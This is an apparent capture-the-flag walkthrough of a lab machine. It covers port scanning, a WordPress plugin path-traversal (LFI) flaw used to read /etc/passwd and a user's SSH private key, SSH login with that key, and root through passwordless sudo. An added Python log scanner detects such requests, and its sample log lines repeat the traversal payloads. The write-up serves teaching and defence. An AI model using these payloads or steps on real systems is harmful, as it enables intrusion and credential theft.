CMS

Last updated 3 years ago

nmap

mkdir nmap
sudo rustscan -a 172.31.1.8 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan 

The scan shows a web service available on port 80.

Web enumeration

The website appears to be running WordPress.

Run wpscan; after a few seconds it reports that the site is vulnerable to Local File Inclusion (LFI).

wpscan --url <url> --api-token <token> | tee wpscan-root

Exploitation

We can use the LFI to read /etc/passwd:

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Then grab the private SSH key of user angel:

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/angel/.ssh/id_rsa
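
From the defender's side, both requests above leave a recognisable trace in the web server access log. The following is an added example, not part of the original writeup: it flags requests to the plugin endpoint whose url parameter carries path traversal or names a sensitive local file. It assumes combined-format access logs; the SENSITIVE list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client address, request target and status from a combined-format log entry.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ENDPOINT = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
# Local files worth alerting on when named in the `url` parameter (assumed list).
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/.ssh/", "wp-config.php")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .), at most `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for a suspicious plugin request, else None; served=True means HTTP 200."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not fully_decode(parts.path).endswith(ENDPOINT):
        return None
    reasons = set()
    for raw in parse_qs(parts.query).get("url", []):  # parse_qs decodes once
        value = fully_decode(raw).replace("\\", "/")
        if "../" in value:
            reasons.add("path traversal")
        if any(s in value for s in SENSITIVE):
            reasons.add("sensitive file")
    if not reasons:
        return None
    return {"ip": m["ip"], "reasons": sorted(reasons), "served": m["status"] == "200"}

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample entries (client addresses from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2022:10:00:01 +0000] "GET ' + ENDPOINT + '?url=/../../../..//etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.79"',
    '198.51.100.23 - - [01/Jan/2022:10:00:09 +0000] "GET ' + ENDPOINT + '?url=%252e%252e%252f%252e%252e%252fhome/angel/.ssh/id_rsa HTTP/1.1" 404 310 "-" "curl/7.79"',
    '192.0.2.15 - - [01/Jan/2022:10:01:00 +0000] "GET ' + ENDPOINT + '?url=https://example.com/post HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A finding with served set to True on a request for a private key or credential file means the key should be treated as compromised and rotated.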

Exploitation

Log in via SSH using the id_rsa file we found (saved here as angel_id_rsa).

chmod 600 angel_id_rsa
ssh -i ./angel_id_rsa angel@172.31.1.8

Privilege Escalation

We can run any command through sudo without a password, so just run sudo su to log in as root.